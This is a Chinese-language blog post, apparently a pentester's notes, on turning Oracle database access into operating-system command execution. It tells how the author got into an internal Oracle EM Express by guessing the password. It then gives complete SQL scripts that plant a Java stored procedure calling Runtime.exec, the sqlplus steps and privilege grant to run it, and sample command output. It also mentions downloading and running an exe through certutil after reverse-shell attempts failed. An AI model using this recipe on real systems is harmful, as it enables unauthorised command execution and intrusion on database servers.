Dayu

sCRiPt n00b

通过Oracle执行系统命令

成功连接上Oracle后,如何通过Oracle get到os-shell,网上搜集资料解决后进行简单记录。

经历如下:内网中发现oralce em express服务,一个oracle的web管理端,碰撞密码进入后,没有找到什么getshell的点,甚至数据查询等也没有发现,无意中发现了dispather设置项,通过添加dispather监听0.0.0.0后成功连接上数据库(默认的1521是监听在127.0.0.1上的)。

oracle提权执行命令工具oracleShell v0.1

为了快速getshell,通常先去找找有没有现成的实现,找到了rebeyond师傅写的一个小工具。

链接:https://www.cnblogs.com/rebeyond/p/7928887.html

环境中的oracle版本为12c,这款工具是前两年开发,集成的jdbc版本低,不支持12c新的连接协议,连接会报ORA-28547错误,11g以下的版本应该是可以使用的。

使用sql*plus

Oracle的sql*plus是与oracle进行命令行交互的客户端工具,安装oracle一般会自带。

连接命令分两种(dba用户登录时带上as sysdba):

  1. sqlplus 用户名/密码@ip:port/sid [as sysdba]
  2. sqlplus /nolog
    SQL> conn 用户名/密码@ip:port/sid [as sysdba]

sqlplus自带了一个比较坑的命令host

SQL> host hostname

你会发现显示的是你本机的机器名,原来是在本机上执行命令,而不是在连接的远程机器上,好吧。。。

网上找来的方法:

首先在本地新建3个sql文件,用于sqlplus连接后进行执行

新建1.sql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}

新建2.sql

1
2
3
4
5
create or replace
function run_cmd(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';

新建3.sql

1
2
3
4
5
6
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := run_cmd(p_cmd);
end;

登陆上去后依次执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
SQL> @1.sql
35 /

Java 已创建。

SQL> @2.sql
6 /

函数已创建。

SQL> @3.sql
7 /

过程已创建。

SQL>
SQL> variable x number;
SQL> set serveroutput on;
SQL> exec dbms_java.set_output(100000);
SQL> grant javasyspriv to system; [这里的system换成你的登录名,dba账户不需要执行这一步]


PL/SQL 过程已成功完成。

SQL> exec :x:=run_cmd('ipconfig');

Windows IP Configuration


Ethernet adapter 本地连接:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.91.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.91.1

PL/SQL 过程已成功完成。

SQL> exec :x:=run_cmd('whoami'); 可以继续执行其他命令

win2003 + Oracle 11g,win2008 + Oracle 11g,win2008 + Oracle 12c 测试成功

我虽然使用dba登录,比较可惜的是拿到的cmd权限还是很低,测试和非dba一样,网上的文章看到一些11g版本的测试,dba账户往往能拿到较高的权限。尝试powershell bitsadmin下载和反弹cs都没有成功(主要是因为权限低的问题),最后通过certutil下载exe成功执行。

后续还要对oracle以及oracle的安全问题原理进行研究。

参考文章

https://www.cnblogs.com/xiaozi/p/6017322.html

Proudly powered by Hexo and Theme by Hacker
© 2019 大宇